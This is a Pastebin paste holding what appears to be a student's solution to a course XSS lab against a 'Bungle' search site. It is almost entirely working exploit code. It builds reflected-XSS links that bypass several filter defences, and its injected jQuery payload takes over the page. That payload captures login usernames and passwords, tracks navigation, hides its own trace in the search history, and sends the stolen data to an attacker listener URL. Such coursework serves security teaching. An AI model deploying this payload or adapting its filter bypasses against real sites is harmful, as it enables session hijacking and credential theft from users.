Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- // Extend this function:
- function payload(attacker) {
- var target = 'http://bungle-cs461.csl.illinois.edu/';
- function listen(href) {
- bunglelnk(href)
- search(href)
- searchAgain(href)
- searchHistory()
- login()
- create()
- logout()
- backforward()
- }
- function bunglelnk(href) {
- $(/#bungle-lnk/.source).on(/click/.source, function(event) {
- event.preventDefault()
- history.pushState(null, null, href);
- proxy(target)
- })
- }
- function search(href) {
- $(/#search-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- history.pushState(null,null,href)
- var query1 = $(/#query/.source).val()
- var query = query1.replace(/\s/g, '+');
- req = target + /search?q=/.source + query
- $.get(req, {q: query1}, function(){
- history.pushState(null, null, req);
- proxy(req)
- })
- })
- }
- function searchAgain(href) {
- $(/#search-again-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- history.pushState(null, null, href);
- proxy(target)
- })
- }
- function searchHistory(){
- var histlist = $(/#history-list/.source)
- if(histlist.html())
- {
- histlist.children(/a/.source).each(function(index, element){
- var a = $(element)
- var b = /payload(attacker, target)/.source
- if(~a.html().indexOf(b))
- a.remove()
- a.on(/click/.source, function(event){
- event.preventDefault()
- var query1 = a.text()
- var query = query1.replace(/\s/g, '+');
- req = target + /search?q=/.source + query
- $.get(target+/search/.source, {q: query1}, function(){
- history.pushState(null,null,req)
- proxy(req)
- })
- })
- })
- }
- }
- function login() {
- $(/#log-in-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- var use = $(/#username/.source).val()
- var pas = $(/#userpass/.source).val()
- var event = /login/.source
- $.post(target + event, {username: use, password: pas}, function() {
- log({event: event, user: use, pass: pas})
- proxy(String.fromCharCode(46, 47))
- })
- })
- }
- function create() {
- $(/#new-account-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- var use = $(/#username/.source).val()
- var pas = $(/#userpass/.source).val()
- var event = /create/.source
- $.post(target + event, {username: use, password: pas}, function() {
- proxy(target)
- })
- })
- }
- function logout() {
- $(/#log-out-btn/.source).on(/click/.source, function(event) {
- event.preventDefault()
- var use = $(/#logged-in-user/.source).text()
- var event = /logout/.source
- $.post(target +event, {}, function(){
- log({event: event, user: use})
- proxy(target)
- })
- })
- }
- function backforward() {
- window.onpopstate = function(event) {
- proxy(window.location.href)
- }
- }
- function log(data) {
- $.get(attacker, data);
- }
- function proxy(href) {
- history.replaceState(null, null, href);
- $(/html/.source).load(href, function() {
- $(/html/.source).show();
- var use = $(/#logged-in-user/).text()
- if(use)
- log({event: /nav/.source, user: use, url: href});
- else
- log({event: /nav/.source, url: href});
- listen(href);
- })
- }
- $(/html/.source).hide();
- proxy(String.fromCharCode(46, 47));
- }
- function makeLink(xssdefense, target, attacker) {
- //console.log("xssdefense = " + xssdefense);
- switch (xssdefense) {
- case 0: // No defense.
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</script" + ">");
- break;
- case 1: // Remove script tag.
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<scrscriptipt" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</scrscriptipt" + ">");
- break;
- case 2: // Recursively remove script tag.
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<body onload=\"" + payload.toString() +
- ";payload(\"" + attacker + "\");" + "\">");
- break;
- case 3: // Recursively remove several tags.
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<iframe onload=\"" + payload.toString() +
- ";payload(\"" + attacker + "\");\" style='width:0;height:0;border:0; border:none;'></iframe" + ">");
- break;
- case 4: // Remove all quotes and semicolons.
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<scrscriptipt" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</scrscriptipt" + ">");
- break;
- }
- }
- var xssdefense = 1;
- var target = "http://bungle-cs461.csl.illinois.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3></h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement